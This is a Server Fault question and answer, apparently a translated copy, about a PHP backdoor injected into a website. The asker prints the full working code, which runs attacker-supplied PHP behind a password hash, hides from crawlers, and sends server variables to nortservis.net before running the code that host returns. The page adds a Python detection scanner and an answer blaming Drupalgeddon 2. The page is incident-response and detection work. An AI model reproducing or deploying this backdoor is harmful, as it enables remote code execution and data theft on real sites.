
Block injection hack

Server Fault user
Asked on 2018-06-22 11:28:20
Answers: 1  Views: 1.3K  Followers: 0  Votes: 0

Someone injected the following code into one of my PHP files:

// Backdoor gate: whoever knows the password whose MD5 is this hash can run arbitrary PHP sent base64-encoded in the "cookies_p" POST field.
if(md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d") { eval(base64_decode($_POST["cookies_p"])); }
// Kill switch: a request whose URI contains "post_render" gets an empty response and exits, unless the same password is supplied in "fdgdfgvv".
if (strpos($_SERVER['REQUEST_URI'], "post_render" ) !== false) { $patchedfv = "GHKASMVG"; }
if( isset( $_REQUEST['fdgdfgvv'] ) ) { if(md5($_REQUEST['fdgdfgvv']) === "93ad003d7fc57aae938ba483a65ddf6d") { $patchedfv = "SDFDFSDF"; } }
if($patchedfv === "GHKASMVG" ) { @ob_end_clean();  die;  }

// Cloaking: only user agents containing "Win" reach the payload path below; all PHP errors are silenced.
if (strpos($_SERVER["HTTP_USER_AGENT"], "Win" ) === false) { $kjdke_c = 1; }
error_reporting(0);
if(!$kjdke_c) { global $kjdke_c; $kjdke_c = 1;
global $include_test; $include_test = 1;
$bkljg=$_SERVER["HTTP_USER_AGENT"];
// Crawler and scanner user-agent fragments. Note the attacker's own typo: "WordPress". "integromedb" concatenates the two strings instead of separating them.
$ghfju = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler", "bot", "spid", "Lynx", "PHP", "WordPress". "integromedb","SISTRIX","Aggregator", "findlinks", "Xenu", "BacklinkCrawler", "Scheduler", "mod_pagespeed", "Index", "ahoo", "Tapatalk", "PubSub", "RSS", "WordPress");
// Skip the payload for crawlers, visitors already marked with the "condtions" cookie, empty user agents, self-referrals, requests from localhost or the server itself, and the df/dl debug switches.
if( !($_GET['df'] === "2") and !($_POST['dl'] === "2" ) and ((preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) or (@$_COOKIE['condtions'])  or (!$bkljg) or ($_SERVER['HTTP_REFERER'] === "http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']) or ($_SERVER['REMOTE_ADDR'] === "127.0.0.1")  or ($_SERVER['REMOTE_ADDR'] === $_SERVER['SERVER_ADDR']) or ($_GET['df'] === "1") or ($_POST['dl'] === "1" )))
{}
else
{
// Exfiltrate every $_SERVER value (base64-encoded) to the attacker's host via POST.
foreach($_SERVER as $ndbv => $cbcd) { $data_nfdh.= "&REM_".$ndbv."='".base64_encode($cbcd)."'";}
$context_jhkb = stream_context_create(
array('http'=>array(
                        'timeout' => '15',
                        'header' => "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:10.0.9) Gecko/20100101 Firefox/10.0.9_ Iceweasel/10.0.9\r\nConnection: Close\r\n\r\n",
                        'method' => 'POST',
                        'content' => "REM_REM='1'".$data_nfdh
)));
// Whatever the remote server returns is executed as PHP. If the callback fails, the visitor is marked with a two-day cookie so the payload is not retried.
$vkfu=file_get_contents("http://nortservis.net/session.php?id", false ,$context_jhkb);
if($vkfu) { @eval($vkfu); } else {ob_start();  if(!@headers_sent()) { @setcookie("condtions","2",time()+172800); } else { echo "document.cookie='condtions=2; path=/; expires=".date('D, d-M-Y H:i:s',time()+172800)." GMT;';"; } ;};
}

}

I blocked nortservis.net in /etc/hosts. I disabled allow_url_fopen. I have fail2ban on the server, but it did not catch this. What can I do?
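As an added example (not part of the original question or answer), a small Python scanner that flags the indicators visible in the injected snippet: an eval over base64-decoded request data, an MD5-gated password check against a hard-coded hash, a remote fetch whose result is passed to eval, and the crawler user-agent cloaking test. The PHP it scans is a constructed sample that reuses the hash and host from the posted code; the rule names are my own.

```python
"""Scan PHP source for the backdoor patterns seen in the injected snippet."""
import re

# Constructed sample: the page's injected block (abbreviated) ahead of a normal file.
SAMPLE_PHP = r'''<?php
if(md5($_POST["pf"]) === "93ad003d7fc57aae938ba483a65ddf6d") { eval(base64_decode($_POST["cookies_p"])); }
$ghfju = array("Google", "Slurp", "MSNBot", "bot", "spid");
if(preg_match("/" . implode("|", $ghfju) . "/i", $bkljg)) {}
$vkfu=file_get_contents("http://nortservis.net/session.php?id", false ,$context_jhkb);
if($vkfu) { @eval($vkfu); }
// ordinary application code follows
echo "hello";
'''

# (rule name, regex). Written against the code on the page, not a general signature set.
# The last capture group of each rule, when present, is reported as the finding detail.
RULES = [
    ("eval_of_base64_request",
     re.compile(r'eval\s*\(\s*base64_decode\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b')),
    ("md5_password_gate",
     re.compile(r'md5\s*\(\s*\$_(POST|GET|REQUEST)\[[^\]]+\]\s*\)\s*===?\s*"([0-9a-f]{32})"')),
    ("remote_fetch_then_eval",
     re.compile(r'file_get_contents\s*\(\s*"(https?://[^"]+)"[\s\S]{0,200}?eval\s*\(')),
    ("bot_cloaking",
     re.compile(r'preg_match\s*\(\s*"/"\s*\.\s*implode\s*\(\s*"\|"')),
]


def scan_php(source: str) -> list:
    """Return one finding per rule match: rule name, 1-based line, and detail (hash or URL)."""
    findings = []
    for name, rx in RULES:
        for m in rx.finditer(source):
            line = source.count("\n", 0, m.start()) + 1
            detail = m.group(m.lastindex) if m.lastindex else ""
            findings.append({"rule": name, "line": line, "detail": detail})
    return findings


def triage(source: str) -> set:
    """Set of rule names that fired; any hit on a file you did not write deserves a look."""
    return {f["rule"] for f in scan_php(source)}


if __name__ == "__main__":
    for f in scan_php(SAMPLE_PHP):
        print(f"line {f['line']:>3}  {f['rule']:<24} {f['detail']}")
```

Point `scan_php` at each file under the web root (for example via `pathlib.Path.rglob("*.php")`) and compare the reported hash and host against what you see in access logs and outbound connections.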


1 Answer

Server Fault user

Accepted answer

Posted on 2018-06-23 06:56:33

A few weeks ago I ran into the same problem as you: exactly the same code was injected into PHP files on my server.

In my case, I found that my Drupal site was not up to date and had been exploited through the vulnerability known as Drupalgeddon 2 (aka SA 2018-002), which was used to tamper with my system and inject this PHP. Given the severity of the vulnerability, I wiped my server and reinstalled it (lesson learned: keep your systems updated!)

If you run Drupal, verify that your version is up to date and not vulnerable to SA 2018-002. Exploitation of that vulnerability may show up in your access logs as suspicious POST entries.

Votes: 1

The original page content is provided by Server Fault; translation supported by the Tencent Cloud Xiaowei IT-domain engine.
Original link: https://serverfault.com/questions/917777
